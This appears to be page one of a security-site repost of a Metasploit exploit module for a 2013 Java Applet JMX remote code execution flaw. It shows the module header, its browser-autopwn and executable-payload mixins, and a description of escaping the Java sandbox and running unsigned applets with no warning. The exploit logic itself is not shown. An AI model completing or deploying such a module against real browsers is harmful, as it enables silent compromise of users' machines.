Java Applet JMX remote code execution-vulnerability warning-the black bar safety net

ID MYHACK58:62201337501
Type myhack58
Reporter 佚名
Modified 2013-02-26T00:00:00


This file is part of the Metasploit Framework and may be subject to

redistribution and commercial restrictions. Please see the Metasploit

web site for more information on licensing and terms of use.

require 'msf/core'

require 'rex'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML

include Msf::Exploit::EXE

include Msf::Exploit::Remote::BrowserAutopwn

autopwn_info({ :javascript => false })

def initialize( info = {} )

super( update_info( info,

'Name' => 'Java Applet JMX Remote Code Execution',

'Description' => %q{

This module abuses the JMX classes from a Java Applet to run arbitrary Java code

outside of the sandbox as exploited in the wild in February of 2 0 1 3. Additionally,

this module bypasses default security settings introduced in Java 7 Update 1 0 to run

unsigned applet without displaying any warning to the user.

[1] [2] [3] [4] [5] [6] next